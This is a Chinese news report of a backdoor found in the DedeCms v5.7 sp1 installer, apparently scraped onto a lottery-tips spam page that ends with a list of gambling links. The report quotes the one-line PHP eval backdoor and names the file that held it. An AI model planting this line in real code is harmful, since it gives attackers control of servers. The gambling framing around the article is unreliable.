您现在的位置: 主页 > 铁算盘心水坛 > 正文

铁算盘心水坛

  • 织梦CMS系统被曝植入后门 70万网站资料或泄露

    时间:2021-09-16

  •   网易科技讯 3月22日消息,瑞星360今日对外发布警示,称国内知名的PHP开源网站管理系统织梦CMS(DedeCms)v5.7 sp1版本安装包被发现植入后门,黑客可通过此后门直接获得网站的控制权限,获取存储在服务器上的文件和数据库。

      据织梦CMS官方数据显示,目前约有70万网站使用该系统搭建,涉及企业、政府机关、媒体机构、行业及个人网站等。

      安全界人士分析发现,此次织梦CMS曝出的后门恶意代码存在于购物车类文件(shopcar.class.php)中,此类文件被植入一句后门代码“@eval(file_get_contents(php://input));”。凡是调用该购物车类的文件均会触发后门,黑客只需要构造简单的数据包提交到服务器,就能够获取到该网站的WebShell,通过对服务器进一步渗透攻击,进而获取服务器的最高权限,直接访问服务器上的文件、数据库等信息。(易科)

香港挂牌成语| 牛魔王管家彩图内部新传密| 香港马经图库彩色国库| 管家婆小鱼儿论坛心水| 宝贝论坛| 香港正版挂牌彩图全编| 三五图库大全印刷| 波肖门免费图库| 香港六和开奖现场直播79888| 今期待码挂牌彩图|